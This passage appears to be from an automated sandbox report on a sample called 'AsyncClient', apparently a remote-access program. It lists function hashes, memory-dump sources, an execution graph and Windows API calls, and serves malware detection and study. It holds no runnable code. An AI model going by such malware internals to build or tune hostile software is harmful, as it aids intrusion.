                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                            • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                            • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                            • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                            Function 06C37CC0 Relevance: .0, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891213514.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c30000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                            Function 06C3D140 Relevance: .0, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891213514.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c30000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                            Function 06BD5480 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                            • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                            • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                            • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                            Non-executed Functions

                                                            Function 06B63F80 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %
                                                            • API String ID: 0-2567322570
                                                            • Opcode ID: ad2b992bfaa6461bde2fb361e3eb05625ce46df7c012461a3ef21f540fc34132
                                                            • Instruction ID: 9736a7ef332c47a87555c3f688fd31ee6346914b2362b0d0c865b6012bccce59
                                                            • Opcode Fuzzy Hash: ad2b992bfaa6461bde2fb361e3eb05625ce46df7c012461a3ef21f540fc34132
                                                            • Instruction Fuzzy Hash: 10025CB0A00304CFDB99EFB9C8446AEBBF2FF88305F108569E5169B395DB349906CB51
                                                            Function 06BD0480 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LIZh
                                                            • API String ID: 0-2364592738
                                                            • Opcode ID: fe79556fda8e129c6111993982fb5f5a95d29c54c57a6250f99b98a1071ef34c
                                                            • Instruction ID: e196db25cda6496335826f92646c346ae9430a62a97d456efd49af36a16fc8fb
                                                            • Opcode Fuzzy Hash: fe79556fda8e129c6111993982fb5f5a95d29c54c57a6250f99b98a1071ef34c
                                                            • Instruction Fuzzy Hash: 09D14BB1E001699FCB55DFA8C9806AEFBF1FF88304F1486A9D455EB205E734A945CF90
                                                            Function 06BD0410 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LIZh
                                                            • API String ID: 0-2364592738
                                                            • Opcode ID: 8f1a56f5b338ff30a7309b8cb5ccfb4a79903938b4408d3947a32654019aec3c
                                                            • Instruction ID: 347247103ccb3bf40fcfb4dcc385e6bbb4cc965f63cebf5e8c6a4394409ea6ca
                                                            • Opcode Fuzzy Hash: 8f1a56f5b338ff30a7309b8cb5ccfb4a79903938b4408d3947a32654019aec3c
                                                            • Instruction Fuzzy Hash: 4BB18EB1E042599FCB55DFA8C9806AEBBF1FF88300F1581AAD454EF252E7349945CF90
                                                            Function 06B61170 Relevance: 1.3, Instructions: 1255COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f27fc285688552983e0d4e97b4bac84a82a495052b9b6a69a4b6792e9e910bc
                                                            • Instruction ID: 25abdb72b08b827701cb560e95e62776c24a9efd4c82d1802566146c8b25f083
                                                            • Opcode Fuzzy Hash: 5f27fc285688552983e0d4e97b4bac84a82a495052b9b6a69a4b6792e9e910bc
                                                            • Instruction Fuzzy Hash: ADC23974A01219CFDB65EF69C844BADBBB2FF89305F1081A9E90AA7350DB359D81CF50
                                                            Function 028CA7A8 Relevance: 1.0, Instructions: 1021COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 861443cb7e2d6b618cd952859bb0ffc0cbeaf5bd5386bd8f90fc6c1643587b4c
                                                            • Instruction ID: 7af48440711f5cf0cbd7cae681bb9ad6b2f4ecb469355c7869d1c8e1844b7e7b
                                                            • Opcode Fuzzy Hash: 861443cb7e2d6b618cd952859bb0ffc0cbeaf5bd5386bd8f90fc6c1643587b4c
                                                            • Instruction Fuzzy Hash: 268258787003058FDB18EF69D885B2EBBE2BF84305F20856DE5069B3A5CB75DD068B91
                                                            Function 06B6ADB0 Relevance: .5, Instructions: 481COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891058345.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6b60000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5788e368b0ee292e69a4896e833b02428ad5b87f6b7bc96c7560f92563df9710
                                                            • Instruction ID: 59ccd57ef0375f77005f33f391c946f5a7ccf24974c27ea65b07a294f68d72fb
                                                            • Opcode Fuzzy Hash: 5788e368b0ee292e69a4896e833b02428ad5b87f6b7bc96c7560f92563df9710
                                                            • Instruction Fuzzy Hash: 962237B0A00218DFDB55DF66C894A9DBBB2FF89301F1080A9E909EB251DB34DD85CF51
                                                            Function 06BD4DE1 Relevance: .3, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7f843d3fa00ab0afe9ea4c8eee5947d57355207451981ed8fa0d1e849a15966
                                                            • Instruction ID: 744be8ba49806b17460bc31db692b2c3780dfb8960125db02a2a98e01e50fc07
                                                            • Opcode Fuzzy Hash: a7f843d3fa00ab0afe9ea4c8eee5947d57355207451981ed8fa0d1e849a15966
                                                            • Instruction Fuzzy Hash: AFB1EFB2614200DFE7A4EB90D854BBA73E3FBC4304F1485A4D5065F299EB74AD85CB90
                                                            Function 028C59A8 Relevance: .2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3883685729.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_28c0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 796d6d3d91b9274d18bb9d4b022799a803f3d52ae64f23aed883e3ebcb05fd9c
                                                            • Instruction ID: ed5caa50363b45dbe86b2ede8c4e4a9e7856ebf42cc6c12dceb1b11e35f1df27
                                                            • Opcode Fuzzy Hash: 796d6d3d91b9274d18bb9d4b022799a803f3d52ae64f23aed883e3ebcb05fd9c
                                                            • Instruction Fuzzy Hash: 95914B78E002098FDF14CFA9C88179DBBF2AF88704F64812DE419F7294DB78A845CB81
                                                            Function 06C3A000 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891213514.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c30000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7594e97d5b6bb1c79213f52a7a7a747b4aaa9e649be3356fc9d5727ad3531d2
                                                            • Instruction ID: 18fa5f9b77024dad5b192260ff6bd5a3235c8ffbfddc6e17ee12c2256753407b
                                                            • Opcode Fuzzy Hash: d7594e97d5b6bb1c79213f52a7a7a747b4aaa9e649be3356fc9d5727ad3531d2
                                                            • Instruction Fuzzy Hash: B3517035B04224CFEB84DBEAD844B6A73A3F7C8310F68C029E5469B398CB799D55CB50
                                                            Function 06C3A010 Relevance: .2, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891213514.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c30000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1604ed99cbdfaa758108ac0d7fcdd43b1fd1fee51c42b891860d23ea786b8334
                                                            • Instruction ID: 342409ba4b6c4d2f909f91ffd1313b90515259d0bbe5f2180468bcdfce5af28e
                                                            • Opcode Fuzzy Hash: 1604ed99cbdfaa758108ac0d7fcdd43b1fd1fee51c42b891860d23ea786b8334
                                                            • Instruction Fuzzy Hash: 62518131B04214CFEB84DBEAD844B6A73B3F7C8310F58C029D5469B298CB799D95CB50
                                                            Function 06BD49B1 Relevance: .2, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37d87ce2c5f1f81760a4e99e31e93a09d1ec58b31e395969a998d0d4e1a80d88
                                                            • Instruction ID: 3d52dcbd8abf958394997521c695acc61a2d5564265df06938c122e614d162ab
                                                            • Opcode Fuzzy Hash: 37d87ce2c5f1f81760a4e99e31e93a09d1ec58b31e395969a998d0d4e1a80d88
                                                            • Instruction Fuzzy Hash: 9C519B74A08218CFEB84DB94D984BAE77F3FB88310F1890B5D501AB798EB745D85CB90
                                                            Function 06BD49C0 Relevance: .1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3891176015.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6bd0000_AsyncClient.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dd73037ef5621e0d39b8e42496999a81b7b8620a33436f996cc743ce7a04eda
                                                            • Instruction ID: 19fdae1915a91552080fca47cce5879c850e3a764e407c4dff93f1f61a275e8c
                                                            • Opcode Fuzzy Hash: 8dd73037ef5621e0d39b8e42496999a81b7b8620a33436f996cc743ce7a04eda
                                                            • Instruction Fuzzy Hash: A2516874A04218CFEB84DB94D884BAE77F3FB88310F2890B5D505AB798EB745D85DB90

                                                            Execution Graph

                                                            Execution Coverage:9.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:4.3%
                                                            Total number of Nodes:161
                                                            Total number of Limit Nodes:14
                                                            execution_graph 22623 732a1d0 22624 732a35b 22623->22624 22626 732a1f6 22623->22626 22626->22624 22627 73276d8 22626->22627 22628 732a450 PostMessageW 22627->22628 22629 732a4bc 22628->22629 22629->22626 22640 7327060 22641 7327072 22640->22641 22644 7327097 22641->22644 22642 7327092 22645 73270d0 22644->22645 22647 7327324 22644->22647 22646 73274aa 22645->22646 22650 7327aa8 22645->22650 22656 7327a99 22645->22656 22646->22642 22647->22642 22651 7327ad3 22650->22651 22652 7327b52 22651->22652 22662 7327eb0 22651->22662 22669 732812d 22651->22669 22674 7327ea0 22651->22674 22652->22647 22657 7327ad3 22656->22657 22658 7327b52 22657->22658 22659 7327eb0 2 API calls 22657->22659 22660 7327ea0 2 API calls 22657->22660 22661 732812d PostMessageW 22657->22661 22658->22647 22659->22658 22660->22658 22661->22658 22663 7327f0a 22662->22663 22666 7327f83 22662->22666 22663->22666 22689 73242e8 22663->22689 22665 73280cd 22665->22652 22666->22665 22681 7328203 22666->22681 22685 7328210 22666->22685 22670 73280ab 22669->22670 22671 73280cd 22670->22671 22672 7328203 PostMessageW 22670->22672 22673 7328210 PostMessageW 22670->22673 22671->22652 22672->22671 22673->22671 22675 7327f0a 22674->22675 22677 7327f83 22674->22677 22676 73242e8 PeekMessageW 22675->22676 22675->22677 22676->22677 22678 73280cd 22677->22678 22679 7328203 PostMessageW 22677->22679 22680 7328210 PostMessageW 22677->22680 22678->22652 22679->22678 22680->22678 22682 7328211 22681->22682 22683 73276d8 PostMessageW 22682->22683 22684 73282c3 22682->22684 22683->22684 22686 7328238 22685->22686 22687 73276d8 PostMessageW 22686->22687 22688 73282c3 22686->22688 22687->22688 22690 7326688 PeekMessageW 22689->22690 22691 73266ff 22690->22691 22691->22666 22692 73260c0 22695 73260c1 22692->22695 22693 73242e8 PeekMessageW 22693->22695 22694 7326351 22699 7326f70 22694->22699 22706 7326f60 22694->22706 22695->22693 22695->22694 22696 7326172 22695->22696 22700 7326f8f 22699->22700 22713 7329923 22700->22713 22719 7329930 22700->22719 22701 7326fc3 22725 7325df0 22701->22725 22703 7326fd2 22703->22696 22707 7326f6e 22706->22707 22711 7329923 2 API calls 22707->22711 22712 7329930 2 API calls 22707->22712 22708 7326fc3 22709 7325df0 GetCurrentThreadId 22708->22709 22710 7326fd2 22709->22710 22710->22696 22711->22708 22712->22708 22714 732997f GetCurrentThreadId 22713->22714 22716 73299c5 22714->22716 22729 7328814 22716->22729 22720 732997f GetCurrentThreadId 22719->22720 22722 73299c5 22720->22722 22723 7328814 EnumThreadWindows 22722->22723 22724 7329a00 22723->22724 22724->22701 22726 7325dfb 22725->22726 22727 7329d4c GetCurrentThreadId 22726->22727 22728 7329d77 22726->22728 22727->22728 22728->22703 22730 7329a20 EnumThreadWindows 22729->22730 22732 7329a00 22730->22732 22732->22701 22630 2cad460 22631 2cad4a6 GetCurrentProcess 22630->22631 22633 2cad4f8 GetCurrentThread 22631->22633 22634 2cad4f1 22631->22634 22635 2cad52e 22633->22635 22636 2cad535 GetCurrentProcess 22633->22636 22634->22633 22635->22636 22639 2cad56b 22636->22639 22637 2cad593 GetCurrentThreadId 22638 2cad5c4 22637->22638 22639->22637 22733 2cadab0 DuplicateHandle 22734 2cadb46 22733->22734 22735 2ca4b30 22736 2ca4b3a 22735->22736 22740 2ca4c28 22735->22740 22745 2ca4304 22736->22745 22738 2ca4b5b 22741 2ca4c4d 22740->22741 22749 2ca4d28 22741->22749 22753 2ca4d38 22741->22753 22746 2ca430f 22745->22746 22761 2ca60fc 22746->22761 22748 2ca7460 22748->22738 22751 2ca4d38 22749->22751 22750 2ca4e3c 22750->22750 22751->22750 22757 2ca4988 22751->22757 22754 2ca4d5f 22753->22754 22755 2ca4e3c 22754->22755 22756 2ca4988 CreateActCtxA 22754->22756 22756->22755 22758 2ca5dc8 CreateActCtxA 22757->22758 22760 2ca5e8b 22758->22760 22762 2ca6107 22761->22762 22765 2ca611c 22762->22765 22764 2ca750d 22764->22748 22766 2ca6127 22765->22766 22769 2ca614c 22766->22769 22768 2ca75e2 22768->22764 22770 2ca6157 22769->22770 22773 2ca617c 22770->22773 22772 2ca76e5 22772->22768 22774 2ca6187 22773->22774 22776 2ca89eb 22774->22776 22779 2cab09a 22774->22779 22775 2ca8a29 22775->22772 22776->22775 22783 2cad189 22776->22783 22788 2cab0bf 22779->22788 22792 2cab0d0 22779->22792 22780 2cab0ae 22780->22776 22785 2cad1b9 22783->22785 22784 2cad1dd 22784->22775 22785->22784 22800 2cad348 22785->22800 22804 2cad338 22785->22804 22789 2cab0d0 22788->22789 22795 2cab1b8 22789->22795 22790 2cab0df 22790->22780 22794 2cab1b8 GetModuleHandleW 22792->22794 22793 2cab0df 22793->22780 22794->22793 22796 2cab1d9 22795->22796 22797 2cab1fc 22795->22797 22796->22797 22798 2cab400 GetModuleHandleW 22796->22798 22797->22790 22799 2cab42d 22798->22799 22799->22790 22801 2cad355 22800->22801 22802 2cad38f 22801->22802 22808 2cabf00 22801->22808 22802->22784 22805 2cad355 22804->22805 22806 2cad38f 22805->22806 22807 2cabf00 3 API calls 22805->22807 22806->22784 22807->22806 22809 2cabf0b 22808->22809 22811 2cae0a8 22809->22811 22812 2cad6fc 22809->22812 22811->22811 22813 2cad707 22812->22813 22814 2ca617c 3 API calls 22813->22814 22815 2cae117 22814->22815 22816 2cae126 22815->22816 22819 2cae182 22815->22819 22823 2cae190 22815->22823 22816->22811 22820 2cae190 22819->22820 22821 2cae28a KiUserCallbackDispatcher 22820->22821 22822 2cae28f 22820->22822 22821->22822 22825 2cae1be 22823->22825 22824 2cae28f 22825->22824 22826 2cae28a KiUserCallbackDispatcher 22825->22826 22826->22824

                                                            Executed Functions

                                                            Function 07326F60 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 187c9156859b4ac5ac63745532aa440659cdde050e6591081ae62da019ba6a62
                                                            • Instruction ID: 4aab9fcf2028b862e031b50df765ae9e64ce78257e72e1310ddbb97dcc4aa013
                                                            • Opcode Fuzzy Hash: 187c9156859b4ac5ac63745532aa440659cdde050e6591081ae62da019ba6a62
                                                            • Instruction Fuzzy Hash: 3A0180B1A012228FCB44DF78D4152BEBBB1EF88A10B15817AD40AD7702DB319D528BD5
                                                            Function 02CAD451 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02CAD4DE
                                                            • GetCurrentThread.KERNEL32 ref: 02CAD51B
                                                            • GetCurrentProcess.KERNEL32 ref: 02CAD558
                                                            • GetCurrentThreadId.KERNEL32 ref: 02CAD5B1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: a17401d2ccc801da25c63c92f22c03c94e1d154064313d90c557d862cdf60275
                                                            • Instruction ID: efdd98d503f7f9997115541e7071d2b3a169c600e1a7a773ec1c183f2246c12d
                                                            • Opcode Fuzzy Hash: a17401d2ccc801da25c63c92f22c03c94e1d154064313d90c557d862cdf60275
                                                            • Instruction Fuzzy Hash: 255158B090174ACFDB14DFA9D548BDEBBF1BF88318F208459E419AB290DB349944CF65
                                                            Function 02CAD460 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02CAD4DE
                                                            • GetCurrentThread.KERNEL32 ref: 02CAD51B
                                                            • GetCurrentProcess.KERNEL32 ref: 02CAD558
                                                            • GetCurrentThreadId.KERNEL32 ref: 02CAD5B1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 14d9628cb1bb44e3a034558ebe0f221d1c76589e2afa0b62563f72fba469fd07
                                                            • Instruction ID: be9e0d7c0c241c92c139a2cc2b8d08d02f353575f4881b3249b09a7735e78986
                                                            • Opcode Fuzzy Hash: 14d9628cb1bb44e3a034558ebe0f221d1c76589e2afa0b62563f72fba469fd07
                                                            • Instruction Fuzzy Hash: 325167B090034A8FDB14DFAAD548B9EBBF1BF88318F208459E419A7290DB349944CF65
                                                            Function 02CAB1B8 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 2cab1b8-2cab1d7 45 2cab1d9-2cab1e6 call 2caa4ec 44->45 46 2cab203-2cab207 44->46 53 2cab1e8 45->53 54 2cab1fc 45->54 47 2cab21b-2cab25c 46->47 48 2cab209-2cab213 46->48 55 2cab269-2cab277 47->55 56 2cab25e-2cab266 47->56 48->47 99 2cab1ee call 2cab450 53->99 100 2cab1ee call 2cab460 53->100 54->46 58 2cab29b-2cab29d 55->58 59 2cab279-2cab27e 55->59 56->55 57 2cab1f4-2cab1f6 57->54 60 2cab338-2cab3f8 57->60 61 2cab2a0-2cab2a7 58->61 62 2cab289 59->62 63 2cab280-2cab287 call 2caa4f8 59->63 94 2cab3fa-2cab3fd 60->94 95 2cab400-2cab42b GetModuleHandleW 60->95 65 2cab2a9-2cab2b1 61->65 66 2cab2b4-2cab2bb 61->66 64 2cab28b-2cab299 62->64 63->64 64->61 65->66 69 2cab2c8-2cab2d1 call 2caa508 66->69 70 2cab2bd-2cab2c5 66->70 75 2cab2de-2cab2e3 69->75 76 2cab2d3-2cab2db 69->76 70->69 77 2cab301-2cab305 75->77 78 2cab2e5-2cab2ec 75->78 76->75 82 2cab30b-2cab30e 77->82 78->77 80 2cab2ee-2cab2fe call 2caa518 call 2caa528 78->80 80->77 85 2cab310-2cab32e 82->85 86 2cab331-2cab337 82->86 85->86 94->95 96 2cab42d-2cab433 95->96 97 2cab434-2cab448 95->97 96->97 99->57 100->57
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CAB41E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: a605b08f637476ae4fc995c468f92c5682da30ea8cfd8590508b0f03301c8ff2
                                                            • Instruction ID: df36a06835d1d6f44f74609325bd7d62973b7fb52f42ade8f19d56c8f8baf56c
                                                            • Opcode Fuzzy Hash: a605b08f637476ae4fc995c468f92c5682da30ea8cfd8590508b0f03301c8ff2
                                                            • Instruction Fuzzy Hash: C7814B70A00B068FD724DF6AD45575ABBF1FF88308F008A2ED44ADBA40DB75E949CB91
                                                            Function 02CA4988 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 101 2ca4988-2ca5e89 CreateActCtxA 104 2ca5e8b-2ca5e91 101->104 105 2ca5e92-2ca5eec 101->105 104->105 112 2ca5efb-2ca5eff 105->112 113 2ca5eee-2ca5ef1 105->113 114 2ca5f10 112->114 115 2ca5f01-2ca5f0d 112->115 113->112 117 2ca5f11 114->117 115->114 117->117
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CA5E79
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 6498cf388c936bf5443ab3daaa8d4d94bff9802841256f42630424de002b3aef
                                                            • Instruction ID: 8de171a2aa09501177b9e415ed4558a7334f3448640ce0bdf3e9f433bbfd6d01
                                                            • Opcode Fuzzy Hash: 6498cf388c936bf5443ab3daaa8d4d94bff9802841256f42630424de002b3aef
                                                            • Instruction Fuzzy Hash: FF41E2B1D0071ACFDB24DFA9C884B8EBBB5FF88708F60806AD408AB251DB755945CF90
                                                            Function 02CA5DBC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 118 2ca5dbc-2ca5dc4 119 2ca5dcc-2ca5e89 CreateActCtxA 118->119 121 2ca5e8b-2ca5e91 119->121 122 2ca5e92-2ca5eec 119->122 121->122 129 2ca5efb-2ca5eff 122->129 130 2ca5eee-2ca5ef1 122->130 131 2ca5f10 129->131 132 2ca5f01-2ca5f0d 129->132 130->129 134 2ca5f11 131->134 132->131 134->134
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CA5E79
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: a924b0d751c230ba1c2fcc8e6fc7f752a98bf031ae36d5841562236d89c3b593
                                                            • Instruction ID: 1d1683dc851b0ed6f958c6d76b7e972fdad48f4cba3c4d9f12bcde79c32d50b9
                                                            • Opcode Fuzzy Hash: a924b0d751c230ba1c2fcc8e6fc7f752a98bf031ae36d5841562236d89c3b593
                                                            • Instruction Fuzzy Hash: 1541E2B1D0075ACFDB24DFA9C88478EBBF5BF88708F60816AD408AB251DB755A46CF50
